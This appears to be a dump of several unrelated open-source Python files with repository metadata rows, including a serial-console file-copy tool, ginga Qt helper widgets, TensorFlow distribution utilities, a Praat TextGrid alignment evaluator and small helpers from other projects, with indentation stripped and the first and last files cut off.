self.vpub.publish(self.valid_predicates)
'''
update and spin
'''
def spin(self,rate=10):
spin_rate = rospy.Rate(rate)
while not rospy.is_shutdown():
self.tick()
spin_rate.sleep()
| bsd-2-clause | -316,624,933,566,636,700 | 36.025974 | 136 | 0.639951 | false |
wkz/ccp | ccp.py | 1 | 2743 | #!/usr/bin/env python
import argparse
import base64
import re
import sys
import time
import pexpect
class StdioStream(object):
def pull(self):
return sys.stdin.read()
def push(self, data):
return sys.stdout.write(data)
class LocalStream(object):
def __init__(self, spec):
self.spec = spec
def pull(self):
return open(self.spec).read()
def push(self, data):
open(self.spec, "w").write(data)
class ConsoleStream(object):
PROMPT = re.compile(r"^.*[>#$] $", re.MULTILINE)
def __init__(self, cmd, spec):
self.cmd, self.spec = cmd, spec
self.proc = pexpect.spawn(cmd)
self.proc.sendline()
time.sleep(0.5)
self.proc.expect(ConsoleStream.PROMPT)
def _cmd(self, cmd):
self.proc.sendline(cmd)
self.proc.expect(ConsoleStream.PROMPT)
return self.proc.before[len(cmd):]
def _stty_raw(self):
settings = self._cmd("stty -g").strip()
self.stty = settings.splitlines()[0].strip()
self._cmd("stty raw")
return
def _stty_restore(self):
self._cmd("stty " + self.stty)
return
def pull(self):
data = self._cmd("base64 <%s" % self.spec)
return base64.b64decode(data)
def push(self, data):
b64 = base64.b64encode(data)
self._stty_raw()
self.proc.sendline("dd bs=1 count=%d | base64 -d >%s" %
(len(b64), self.spec))
self._cmd(b64)
self._stty_restore()
def stream(spec):
if spec == "-":
return StdioStream()
commfile = spec.split(":")
if len(commfile) == 1:
return LocalStream(commfile[0])
elif len(commfile) == 2:
return ConsoleStream(commfile[0], commfile[1])
return None
def get_opts():
argp = argparse.ArgumentParser(description="""
Console Copy
If COMM is given, it is assumed to be a valid command for interacting
with a remote UNIX like system. If COMM is not given, FILE may be "-";
in which case ccp will use stdio.
Examples:
Transfer a local file to a remote system connected via conserver:
$ ccp /tmp/data 'console -f ser1':/tmp/data
Grep in a remote file:
$ ccp 'screen /dev/ttyS0 115200':/tmp/data - | grep keyword
""", formatter_class=argparse.RawTextHelpFormatter)
argp.add_argument("src",
help="Source to copy from",metavar="[COMM:]FILE")
argp.add_argument("dst",
help="Destination to copy to", metavar="[COMM:]FILE")
opts = argp.parse_args()
return opts
def main():
opts = get_opts()
data = stream(opts.src).pull()
stream(opts.dst).push(data)
sys.exit(0)
if __name__ == '__main__':
main()
| mit | -219,096,259,822,455,140 | 22.646552 | 75 | 0.593146 | false |
xuru/pyvisdk | pyvisdk/do/storage_placement_action.py | 1 | 1308 |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def StoragePlacementAction(vim, *args, **kwargs):
'''Describes a single storage initial placement action for placing a virtual
machine or a set of virtual disks on a datastore.NOTE: This data object type
and all of its methods are experimental and subject to change in future
releases.'''
obj = vim.client.factory.create('ns0:StoragePlacementAction')
# do some validation checking...
if (len(args) + len(kwargs)) < 3:
raise IndexError('Expected at least 4 arguments got: %d' % len(args))
required = [ 'destination', 'relocateSpec', 'type' ]
optional = [ 'ioLatencyBefore', 'spaceUtilAfter', 'spaceUtilBefore', 'vm', 'target',
'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
| mit | 3,664,086,994,449,659,000 | 34.378378 | 124 | 0.626911 | false |
sio2project/oioioi | oioioi/evalmgr/utils.py | 1 | 1149 | import logging
import six
from oioioi.base.utils.db import require_transaction
from oioioi.contests.models import Submission
from oioioi.evalmgr.models import QueuedJob
logger = logging.getLogger(__name__)
@require_transaction
def mark_job_state(environ, state, **kwargs):
"""Sets status of given environ in job queue. Additional arguments are
used to update QueuedJob object. Returns True when the status was
set, and the job should be continued, False when it ought to be
ignored.
"""
if 'submission_id' in environ:
submission = Submission.objects.filter(id=environ['submission_id'])
if submission.exists():
kwargs['submission'] = submission.get()
kwargs['state'] = state
qj, created = QueuedJob.objects.get_or_create(
job_id=environ['job_id'], defaults=kwargs
)
if not created:
if qj.state == 'CANCELLED':
qj.delete()
logger.info('Job %s cancelled.', str(environ['job_id']))
return False
else:
for k, v in six.iteritems(kwargs):
setattr(qj, k, v)
qj.save()
return True
| gpl-3.0 | -7,408,691,713,724,728,000 | 30.916667 | 75 | 0.642298 | false |
google-research/google-research | eim/models/base.py | 1 | 9889 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for models."""
from __future__ import absolute_import
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
def _safe_log(x, eps=1e-8):
return tf.log(tf.clip_by_value(x, eps, 1.0))
def get_squash(squash_eps=1e-6):
return tfp.bijectors.Chain([
tfp.bijectors.AffineScalar(scale=256.),
tfp.bijectors.AffineScalar(
shift=-squash_eps / 2., scale=(1. + squash_eps)),
tfp.bijectors.Sigmoid(),
])
class GSTBernoulli(tfd.Bernoulli):
"""Gumbel-softmax Bernoulli distribution."""
def __init__(self,
temperature,
logits=None,
probs=None,
validate_args=False,
allow_nan_stats=True,
name="GSTBernoulli",
dtype=tf.int32):
"""Construct GSTBernoulli distributions.
Args:
temperature: An 0-D `Tensor`, representing the temperature of a set of
GSTBernoulli distributions. The temperature should be positive.
logits: An N-D `Tensor` representing the log-odds of a positive event.
Each entry in the `Tensor` parametrizes an independent GSTBernoulli
distribution where the probability of an event is sigmoid(logits). Only
one of `logits` or `probs` should be passed in.
probs: An N-D `Tensor` representing the probability of a positive event.
Each entry in the `Tensor` parameterizes an independent Bernoulli
distribution. Only one of `logits` or `probs` should be passed in.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or more
of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
dtype: Type of the Tesnors.
Raises:
ValueError: If both `probs` and `logits` are passed, or if neither.
"""
with tf.name_scope(name, values=[logits, probs, temperature]) as name:
self._temperature = tf.convert_to_tensor(
temperature, name="temperature", dtype=dtype)
if validate_args:
with tf.control_dependencies([tf.assert_positive(temperature)]):
self._temperature = tf.identity(self._temperature)
super(GSTBernoulli, self).__init__(
logits=logits,
probs=probs,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
dtype=dtype,
name=name)
@property
def temperature(self):
"""Distribution parameter for the location."""
return self._temperature
def _sample_n(self, n, seed=None):
new_shape = tf.concat([[n], self.batch_shape_tensor()], 0)
u = tf.random_uniform(new_shape, seed=seed, dtype=self.probs.dtype)
logistic = _safe_log(u) - _safe_log(1 - u)
hard_sample = tf.cast(tf.greater(self.logits + logistic, 0), self.dtype)
soft_sample = tf.math.sigmoid((self.logits + logistic) / self.temperature)
sample = soft_sample + tf.stop_gradient(hard_sample - soft_sample)
return tf.cast(sample, self.dtype)
def mlp(inputs,
layer_sizes,
hidden_activation=tf.math.tanh,
final_activation=tf.math.log_sigmoid,
name=None):
"""Creates a simple fully connected multi-layer perceptron."""
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
inputs = tf.layers.flatten(inputs)
for i, s in enumerate(layer_sizes[:-1]):
inputs = tf.layers.dense(
inputs,
units=s,
activation=hidden_activation,
kernel_initializer=tf.initializers.glorot_uniform,
name="layer_%d" % (i + 1))
output = tf.layers.dense(
inputs,
units=layer_sizes[-1],
activation=final_activation,
kernel_initializer=tf.initializers.glorot_uniform,
name="layer_%d" % len(layer_sizes))
return output
def conditional_normal(inputs,
data_dim,
hidden_sizes,
hidden_activation=tf.math.tanh,
scale_min=1e-5,
truncate=False,
bias_init=None,
scale_init=1.,
nn_scale=True,
name=None):
"""Create a conditional Normal distribution."""
flat_data_dim = np.prod(data_dim)
if nn_scale:
raw_params = mlp(
inputs,
hidden_sizes + [2 * flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name)
loc, raw_scale = tf.split(raw_params, 2, axis=-1)
else:
loc = mlp(
inputs,
hidden_sizes + [flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name + "_loc")
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
raw_scale_init = np.log(np.exp(scale_init) - 1 + scale_min)
raw_scale = tf.get_variable(
name="raw_sigma",
shape=[flat_data_dim],
dtype=tf.float32,
initializer=tf.constant_initializer(raw_scale_init),
trainable=True)
scale = tf.math.maximum(scale_min, tf.math.softplus(raw_scale))
# Reshape back to the proper data_dim
loc = tf.reshape(loc, [-1] + data_dim)
scale = tf.reshape(scale, [-1] + data_dim)
# with tf.name_scope(name):
# tf.summary.histogram("scale", scale, family="scales")
# tf.summary.scalar("min_scale", tf.reduce_min(scale), family="scales")
if truncate:
if bias_init is not None:
loc = loc + bias_init
loc = tf.math.sigmoid(loc)
return tfd.Independent(
tfd.TruncatedNormal(loc=loc, scale=scale, low=0., high=1.),
reinterpreted_batch_ndims=len(data_dim))
else:
return tfd.Independent(tfd.Normal(loc=loc, scale=scale),
reinterpreted_batch_ndims=len(data_dim))
def conditional_bernoulli(inputs,
data_dim,
hidden_sizes,
hidden_activation=tf.math.tanh,
bias_init=None,
dtype=tf.int32,
use_gst=False,
temperature=None,
name=None):
"""Create a conditional Bernoulli distribution."""
flat_data_dim = np.prod(data_dim)
bern_logits = mlp(
inputs,
hidden_sizes + [flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name)
bern_logits = tf.reshape(bern_logits, [-1] + data_dim)
if bias_init is not None:
bern_logits = bern_logits - tf.log(
1. / tf.clip_by_value(bias_init, 0.0001, 0.9999) - 1)
if use_gst:
assert temperature is not None
base_dist = GSTBernoulli(temperature, logits=bern_logits, dtype=dtype)
else:
base_dist = tfd.Bernoulli(logits=bern_logits, dtype=dtype)
return tfd.Independent(base_dist)
class SquashedDistribution(object):
"""Apply a squashing bijector to a distribution."""
def __init__(self, distribution, data_mean, squash_eps=1e-6):
self.distribution = distribution
self.data_mean = data_mean
self.squash = get_squash(squash_eps)
self.unsquashed_data_mean = self.squash.inverse(self.data_mean)
def log_prob(self, data, num_samples=1):
unsquashed_data = (self.squash.inverse(data) - self.unsquashed_data_mean)
log_prob = self.distribution.log_prob(unsquashed_data,
num_samples=num_samples)
log_prob = (log_prob + self.squash.inverse_log_det_jacobian(
data, event_ndims=tf.rank(data) - 1))
return log_prob
def sample(self, num_samples=1):
samples = self.distribution.sample(num_samples)
samples += self.unsquashed_data_mean
samples = self.squash.forward(samples)
return samples
class ProbabilisticModel(object):
"""Abstract class for probablistic models to inherit."""
def log_prob(self, data, num_samples=1):
"""Reshape data so that it is [batch_size] + data_dim."""
batch_shape = tf.shape(data)[:-len(self.data_dim)]
reshaped_data = tf.reshape(data, [tf.math.reduce_prod(batch_shape)] +
self.data_dim)
log_prob = self._log_prob(reshaped_data, num_samples=num_samples)
log_prob = tf.reshape(log_prob, batch_shape)
return log_prob
def _log_prob(self, data, num_samples=1):
pass
def get_independent_normal(data_dim, variance=1.0):
"""Returns an independent normal with event size the size of data_dim.
Args:
data_dim: List of data dimensions.
variance: A scalar that is used as the diagonal entries of the covariance
matrix.
Returns:
Independent normal distribution.
"""
return tfd.Independent(
tfd.Normal(
loc=tf.zeros(data_dim, dtype=tf.float32),
scale=tf.ones(data_dim, dtype=tf.float32)*tf.math.sqrt(variance)),
reinterpreted_batch_ndims=len(data_dim))
| apache-2.0 | -6,552,935,640,835,127,000 | 35.899254 | 80 | 0.631914 | false |
stscieisenhamer/ginga | ginga/qtw/QtHelp.py | 1 | 9071 | #
# QtHelp.py -- customized Qt widgets and convenience functions
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import glob
import os
import math
import ginga.toolkit
from ginga.util import iohelper
configured = False
toolkit = ginga.toolkit.toolkit
# if user wants to force a toolkit
if toolkit == 'qt5':
os.environ['QT_API'] = 'pyqt5'
elif toolkit == 'qt4':
os.environ['QT_API'] = 'pyqt'
elif toolkit == 'pyside':
os.environ['QT_API'] = 'pyside'
have_pyqt4 = False
have_pyqt5 = False
have_pyside = False
try:
from qtpy import QtCore
from qtpy import QtWidgets as QtGui
from qtpy.QtGui import QImage, QColor, QFont, QPixmap, QIcon, \
QCursor, QPainter, QPen, QPolygonF, QPolygon, QTextCursor, \
QDrag, QPainterPath, QBrush
from qtpy.QtCore import QItemSelectionModel
from qtpy.QtWidgets import QApplication
try:
from qtpy.QtWebEngineWidgets import QWebEngineView as QWebView
except ImportError as e:
pass
# Let's see what qtpy configured for us...
from qtpy import PYQT4, PYQT5, PYSIDE
have_pyqt4 = PYQT4
have_pyqt5 = PYQT5
have_pyside = PYSIDE
configured = True
except ImportError as e:
pass
if have_pyqt5:
ginga.toolkit.use('qt5')
os.environ['QT_API'] = 'pyqt5'
elif have_pyqt4:
ginga.toolkit.use('qt4')
os.environ['QT_API'] = 'pyqt'
elif have_pyside:
ginga.toolkit.use('pyside')
os.environ['QT_API'] = 'pyside'
else:
raise ImportError("Failed to configure qt4, qt5 or pyside. Is the 'qtpy' package installed?")
tabwidget_style = """
QTabWidget::pane { margin: 0px,0px,0px,0px; padding: 0px; }
QMdiSubWindow { margin: 0px; padding: 2px; }
"""
class TopLevel(QtGui.QWidget):
app = None
## def __init__(self, *args, **kwdargs):
## return super(TopLevel, self).__init__(self, *args, **kwdargs)
def closeEvent(self, event):
if not (self.app is None):
self.app.quit()
def setApp(self, app):
self.app = app
class ComboBox(QtGui.QComboBox):
def insert_alpha(self, text):
index = 0
while True:
itemText = self.itemText(index)
if len(itemText) == 0:
break
if itemText > text:
self.insertItem(index, text)
return
index += 1
self.addItem(text)
def delete_alpha(self, text):
index = self.findText(text)
self.removeItem(index)
def show_text(self, text):
index = self.findText(text)
self.setCurrentIndex(index)
def append_text(self, text):
self.addItem(text)
class VBox(QtGui.QWidget):
def __init__(self, *args, **kwdargs):
super(VBox, self).__init__(*args, **kwdargs)
layout = QtGui.QVBoxLayout()
# because of ridiculous defaults
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def addWidget(self, w, **kwdargs):
self.layout().addWidget(w, **kwdargs)
def setSpacing(self, val):
self.layout().setSpacing(val)
class HBox(QtGui.QWidget):
def __init__(self, *args, **kwdargs):
super(HBox, self).__init__(*args, **kwdargs)
layout = QtGui.QHBoxLayout()
# because of ridiculous defaults
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def addWidget(self, w, **kwdargs):
self.layout().addWidget(w, **kwdargs)
def setSpacing(self, val):
self.layout().setSpacing(val)
class FileSelection(object):
"""Handle Load Image file dialog from File menu."""
def __init__(self, parent_w):
self.parent = parent_w
self.cb = None
def popup(self, title, callfn, initialdir=None, filename=None):
"""Let user select and load file(s). This allows wildcards and
extensions, like in FBrowser.
Parameters
----------
title : str
Title for the file dialog.
callfn : func
Function used to open the file(s).
initialdir : str or `None`
Directory for file dialog.
filename : str
Filter for file dialog.
"""
self.cb = callfn
filenames = QtGui.QFileDialog.getOpenFileNames(
self.parent, title, initialdir, filename)
# Special handling for PyQt5, see
# https://www.reddit.com/r/learnpython/comments/2xhagb/pyqt5_trouble_with_openinggetting_the_name_of_the/
if ginga.toolkit.get_toolkit() == 'qt5':
filenames = filenames[0]
for filename in filenames:
# Special handling for wildcard or extension.
# This is similar to open_files() in FBrowser plugin.
if '*' in filename or '[' in filename:
info = iohelper.get_fileinfo(filename)
ext = iohelper.get_hdu_suffix(info.numhdu)
files = glob.glob(info.filepath) # Expand wildcard
paths = ['{0}{1}'.format(f, ext) for f in files]
# NOTE: Using drag-drop callback here might give QPainter
# warnings.
for path in paths:
self.cb(path)
# Normal load
else:
self.cb(filename)
class DirectorySelection(object):
"""Handle directory selection dialog."""
def __init__(self, parent_w):
self.parent = parent_w
self.cb = None
def popup(self, title, callfn, initialdir=None):
"""Let user select a directory.
Parameters
----------
title : str
Title for the dialog.
callfn : func
Function used to handle selected directory.
initialdir : str or `None`
Directory for dialog.
"""
self.cb = callfn
dirname = QtGui.QFileDialog.getExistingDirectory(
self.parent, title, initialdir)
if dirname:
self.cb(dirname)
class Timer(object):
"""Abstraction of a GUI-toolkit implemented timer."""
def __init__(self, ival_sec, expire_cb, data=None):
"""Create a timer set to expire after `ival_sec` and which will
call the callable `expire_cb` when it expires.
"""
self.ival_sec = ival_sec
self.data = data
self.timer = QtCore.QTimer()
self.timer.setSingleShot(True)
self.timer.timeout.connect(lambda: expire_cb(self))
def start(self, ival_sec=None):
"""Start the timer. If `ival_sec` is not None, it should
specify the time to expiration in seconds.
"""
if ival_sec is None:
ival_sec = self.ival_sec
# QTimer set in milliseconds
ms = int(ival_sec * 1000.0)
self.timer.start(ms)
def set(self, time_sec):
self.start(ival_sec=time_sec)
def cancel(self):
"""Cancel this timer. If the timer is not running, there
is no error.
"""
try:
self.timer.stop()
except:
pass
clear = cancel
def cmap2pixmap(cmap, steps=50):
"""Convert a Ginga colormap into a QPixmap
"""
inds = numpy.linspace(0, 1, steps)
n = len(cmap.clst) - 1
tups = [ cmap.clst[int(x*n)] for x in inds ]
rgbas = [QColor(int(r * 255), int(g * 255),
int(b * 255), 255).rgba() for r, g, b in tups]
im = QImage(steps, 1, QImage.Format_Indexed8)
im.setColorTable(rgbas)
for i in range(steps):
im.setPixel(i, 0, i)
im = im.scaled(128, 32)
pm = QPixmap.fromImage(im)
return pm
def get_scroll_info(event):
"""
Returns the (degrees, direction) of a scroll motion Qt event.
"""
# 15 deg is standard 1-click turn for a wheel mouse
# delta() usually returns 120
if have_pyqt5:
# TODO: use pixelDelta() for better handling on hi-res devices
point = event.angleDelta()
dx, dy = point.x(), point.y()
delta = math.sqrt(dx ** 2 + dy ** 2)
if dy < 0:
delta = -delta
ang_rad = math.atan2(dy, dx)
direction = math.degrees(ang_rad) - 90.0
direction = math.fmod(direction + 360.0, 360.0)
else:
delta = event.delta()
orientation = event.orientation()
direction = None
if orientation == QtCore.Qt.Horizontal:
if delta > 0:
direction = 270.0
elif delta < 0:
direction = 90.0
else:
if delta > 0:
direction = 0.0
elif delta < 0:
direction = 180.0
num_degrees = abs(delta) / 8.0
return (num_degrees, direction)
def get_icon(iconpath, size=None):
image = QImage(iconpath)
if size is not None:
qsize = QtCore.QSize(*size)
image = image.scaled(qsize)
pixmap = QPixmap.fromImage(image)
iconw = QIcon(pixmap)
return iconw
def get_font(font_family, point_size):
font = QFont(font_family, point_size)
return font
#END
| bsd-3-clause | 8,053,044,321,151,345,000 | 25.837278 | 113 | 0.584169 | false |
meyersbs/misc_nlp_scripts | Prosodylab-Aligner-master/eval.py | 1 | 2762 | #!/usr/bin/env python3
# eval.py: instrinsic evaluation for forced alignment using Praat TextGrids
# Kyle Gorman <[email protected]>
from __future__ import division
from aligner import TextGrid
from sys import argv, stderr
from collections import namedtuple
from argparse import ArgumentParser
CLOSE_ENOUGH = 20
TIER_NAME = "phones"
boundary = namedtuple("boundary", ["transition", "time"])
def boundaries(textgrid, tier_name):
"""
Extract a single tier named `tier_name` from the TextGrid object
`textgrid`, and then convert that IntervalTier to a list of boundaries
"""
tiers = textgrid.getList(tier_name)
if not tiers:
exit('TextGrid has no "{}" tier.'.format(tier_name))
if len(tiers) > 1:
exit('TextGrid has many "{}" tiers.'.format(tier_name))
tier = tiers[0]
boundaries = []
for (interval1, interval2) in zip(tier, tier[1:]):
boundaries.append(boundary('"{}"+"{}"'.format(interval1.mark,
interval2.mark),
interval1.maxTime))
return boundaries
def is_close_enough(tx, ty, close_enough):
"""
Return True iff `tx` and `ty` are within `close_enough` of each other
"""
return abs(tx - ty) < close_enough
if __name__ == "__main__":
# check args
tier_name = TIER_NAME
close_enough = CLOSE_ENOUGH / 1000
argparser = ArgumentParser(description="Alignment quality evaluation")
argparser.add_argument("-f", "--fudge", type=int,
help="Fudge factor in milliseconds")
argparser.add_argument("-t", "--tier",
help="Name of tier to use")
argparser.add_argument("OneGrid")
argparser.add_argument("TwoGrid")
args = argparser.parse_args()
if args.fudge:
close_enough = args.fudge / 1000
if args.tier:
tier_name = args.tier
# read in
first = boundaries(TextGrid.fromFile(args.OneGrid), tier_name)
secnd = boundaries(TextGrid.fromFile(args.TwoGrid), tier_name)
# count concordant and discordant boundaries
if len(first) != len(secnd):
exit("Tiers lengths do not match.")
concordant = 0
discordant = 0
for (boundary1, boundary2) in zip(first, secnd):
if boundary1.transition != boundary2.transition:
exit("Tier labels do not match.")
if is_close_enough(boundary1.time, boundary2.time, close_enough):
concordant += 1
else:
discordant += 1
# print out
agreement = concordant / (concordant + discordant)
print("{} 'close enough' boundaries.".format(concordant))
print("{} incorrect boundaries.".format(discordant))
print("Agreement: {:.4f}".format(agreement))
| mit | 5,643,734,626,767,116,000 | 32.682927 | 75 | 0.625272 | false |
jbarnoud/panedr | tests/test_edr.py | 1 | 8096 | #-*- coding: utf-8 -*-
"""
Tests for panedr
"""
from __future__ import print_function, division
import six
import os
import sys
import unittest
import pytest
import contextlib
import numpy
import pandas
import panedr
import re
# On python 2, cStringIO is a faster version of StringIO. It may not be
# available on implementations other than Cpython, though. Therefore, we may
# have to fail back on StringIO if cStriongIO is not available.
# On python 3, the StringIO object is not part of the StringIO module anymore.
# It becomes part of the io module.
try:
from cStringIO import StringIO
except ImportError:
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from collections import namedtuple
try:
from pathlib import Path
except ImportError:
# Python 2 requires the pathlib2 backport of pathlib
from pathlib2 import Path
# Constants for XVG parsing
COMMENT_PATTERN = re.compile(r'\s*[@#%&/]')
LEGEND_PATTERN = re.compile(r'@\s+s\d+\s+legend\s+"(.*)"')
NDEC_PATTERN = re.compile(r'[\.eE]')
# Data constants
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
EDR = os.path.join(DATA_DIR, 'cat.edr')
EDR_XVG = os.path.join(DATA_DIR, 'cat.xvg') # All EDR fields read with
# ``gmx energy``
EDR_IRREGULAR = os.path.join(DATA_DIR, 'irregular.edr')
EDR_IRREGULAR_XVG = os.path.join(DATA_DIR, 'irregular.xvg')
EDR_DOUBLE = os.path.join(DATA_DIR, 'double.edr')
EDR_DOUBLE_XVG = os.path.join(DATA_DIR, 'double.xvg')
EDR_BLOCKS = os.path.join(DATA_DIR, 'blocks.edr')
EDR_BLOCKS_XVG = os.path.join(DATA_DIR, 'blocks.xvg')
EDR_Data = namedtuple('EDR_Data', ['df', 'xvgdata', 'xvgtime', 'xvgnames',
'xvgprec', 'edrfile', 'xvgfile'])
@pytest.fixture(scope='module',
params=[(EDR, EDR_XVG),
(EDR_IRREGULAR, EDR_IRREGULAR_XVG),
(EDR_DOUBLE, EDR_DOUBLE_XVG),
(EDR_BLOCKS, EDR_BLOCKS_XVG),
(Path(EDR), EDR_XVG),
])
def edr(request):
edrfile, xvgfile = request.param
df = panedr.edr_to_df(edrfile)
xvgdata, xvgnames, xvgprec = read_xvg(xvgfile)
xvgtime = xvgdata[:, 0]
xvgdata = xvgdata[:, 1:]
return EDR_Data(df, xvgdata, xvgtime, xvgnames, xvgprec, edrfile, xvgfile)
class TestEdrToDf(object):
"""
Tests for :fun:`panedr.edr_to_df`.
"""
def test_output_type(self, edr):
"""
Test that the function returns a pandas DataFrame.
"""
assert isinstance(edr.df, pandas.DataFrame)
def test_columns(self, edr):
"""
Test that the column names and order match.
"""
ref_columns = numpy.insert(edr.xvgnames, 0, u'Time')
columns = edr.df.columns.values
if columns.shape[0] == ref_columns.shape[0]:
print('These columns differ from the reference (displayed as read):')
print(columns[ref_columns != columns])
print('The corresponding names displayed as reference:')
print(ref_columns[ref_columns != columns])
assert ref_columns.shape == columns.shape, \
'The number of columns read is unexpected.'
assert numpy.all(ref_columns == columns), \
'At least one column name was misread.'
def test_times(self, edr):
"""
Test that the time is read correctly when dt is regular.
"""
time = edr.df[u'Time'].values
assert numpy.allclose(edr.xvgtime, time, atol=5e-7)
def test_content(self, edr):
"""
Test that the content of the DataFrame is the expected one.
"""
content = edr.df.iloc[:, 1:].values
print(edr.xvgdata - content)
assert numpy.allclose(edr.xvgdata, content, atol=edr.xvgprec/2)
def test_verbosity(self):
"""
Make sure the verbose mode does not alter the results.
"""
with redirect_stderr(sys.stdout):
df = panedr.edr_to_df(EDR, verbose=True)
ref_content, _, prec = read_xvg(EDR_XVG)
content = df.values
print(ref_content - content)
assert numpy.allclose(ref_content, content, atol=prec/2)
def test_progress(self):
"""
Test the progress meter displays what is expected.
"""
output = StringIO()
with redirect_stderr(output):
df = panedr.edr_to_df(EDR, verbose=True)
progress = output.getvalue().split('\n')[0].split('\r')
print(progress)
dt = 2000.0
# We can already iterate on `progress`, but I want to keep the cursor
# position from one for loop to the other.
progress_iter = iter(progress)
assert '' == next(progress_iter)
self._assert_progress_range(progress_iter, dt, 0, 21, 1)
self._assert_progress_range(progress_iter, dt, 30, 201, 10)
self._assert_progress_range(progress_iter, dt, 300, 2001, 100)
self._assert_progress_range(progress_iter, dt, 3000, 14101, 1000)
# Check the last line
print(df.iloc[-1, 0])
ref_line = 'Last Frame read : 14099, time : 28198000.0 ps'
last_line = next(progress_iter)
assert ref_line == last_line
# Did we leave stderr clean with a nice new line at the end?
assert output.getvalue().endswith('\n'), \
'New line missing at the end of output.'
def _assert_progress_range(self, progress, dt, start, stop, step):
for frame_idx in range(start, stop, step):
ref_line = 'Read frame : {}, time : {} ps'.format(frame_idx,
dt * frame_idx)
progress_line = next(progress)
print(frame_idx, progress_line)
assert ref_line == progress_line
def read_xvg(path):
"""
Reads XVG file, returning the data, names, and precision.
The data is returned as a 2D numpy array. Column names are returned as an
array of string objects. Precision is an integer corresponding to the least
number of decimal places found, excluding the first (time) column.
The XVG file type is assumed to be 'xy' or 'nxy'. The function also assumes
that there is only one serie in the file (no data after // is // is
present). If more than one serie are present, they will be concatenated if
the number of column is consistent, is the number of column is not
consistent among the series, then the function will crash.
"""
data = []
names = []
prec = -1
with open(path) as infile:
for line in infile:
if not re.match(COMMENT_PATTERN, line):
data.append(line.split())
precs = [ndec(val) for val in data[-1][1:]]
if prec == -1:
prec = min(precs)
else:
prec = min(prec, *precs)
continue
match = re.match(LEGEND_PATTERN, line)
if match:
names.append(six.text_type(match.groups()[0]))
if prec <= 0:
prec = 1.
else:
prec = 10**(-prec)
return (numpy.array(data, dtype=float),
numpy.array(names, dtype=object),
prec)
def ndec(val):
"""Returns the number of decimal places of a string rep of a float
"""
try:
return len(re.split(NDEC_PATTERN, val)[1])
except IndexError:
return 0
@contextlib.contextmanager
def redirect_stderr(target):
"""
Redirect sys.stderr to an other object.
This function is aimed to be used as a contaxt manager. It is useful
especially to redirect stderr to stdout as stdout get captured by nose
while stderr is not. stderr can also get redirected to any other object
that may act on it, such as a StringIO to inspect its content.
"""
stderr = sys.stderr
try:
sys.stderr = target
yield
finally:
sys.stderr = stderr
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 | 5,920,553,386,538,837,000 | 33.451064 | 81 | 0.600173 | false |
whereaswhile/DLSR | common/SimPrvd.py | 1 | 2133 | #simulated regression data provider
import os
import sys
import numpy as np
import scipy.misc
import glob
sys.path.append("../convnet-folk_master")
from w_util import readLines
# define default parameters
IN_DATA_SIZE=[5, 5, 1]
OUT_DATA_SIZE=[16, 1]
DATA_NUM=1
class SimSet:
def __init__(self, paramfile):
print "SimPrvd: parsing", paramfile
plines = readLines(paramfile)
self.param = {'paramfile': paramfile, 'filtype': 'avg'}
for l in plines:
l=l.rstrip().split()
self.param[l[0]]=l[1]
print self.param
self.indim=1
for s in IN_DATA_SIZE:
self.indim*=s
self.outdim=1
for s in OUT_DATA_SIZE:
self.outdim*=s
# draw data
self.input=[]
self.output=[]
if self.param['filtype'][-4:]=='.fil': #load filter from file
fil=np.loadtxt(self.param['filtype'])
fil=np.reshape(fil, IN_DATA_SIZE)
for i in range(DATA_NUM):
if DATA_NUM==1:
m=np.ones(IN_DATA_SIZE)
else:
m=np.random.random(IN_DATA_SIZE) #random
self.input+=[m]
mm=np.zeros(OUT_DATA_SIZE)
if self.param['filtype']=='avg':
mm[0, 0]=np.mean(m)
else:
mm[0, 0]=np.sum(m*fil)
self.output+=[mm]
def get_num_images(self):
return DATA_NUM
#def get_num_classes(self):
# return 0
def get_input_dim(self):
return self.indim
def get_output_dim(self):
return self.outdim
def get_input(self, idx):
return self.input[idx]
def get_output(self, idx):
return self.output[idx]
def getmeta(self, idx):
return self.param
def getStore(param):
return SimSet(param)
def test(param):
ts = SimSet(param)
print "{} images, {} classes".format(ts.get_num_images(), ts.get_num_classes())
for i in range(0,20,10):
im=ts.get_input(i)
y=ts.get_output(i)
meta=ts.getmeta(i)
print "i={}, input={},\toutput={}".format(i, im, y)
print 'image shape:', np.shape(im)
print 'meta', meta
if __name__ == '__main__':
print 'testing SimPrvd.py!'
assert(len(sys.argv)==2)
test(sys.argv[1])
| gpl-2.0 | 8,928,693,029,719,009,000 | 21.452632 | 83 | 0.592124 | false |
Spoken-tutorial/spoken-website | training/views.py | 1 | 37970 | # Django imports
from django.shortcuts import render, redirect
from django.views.generic import View, ListView
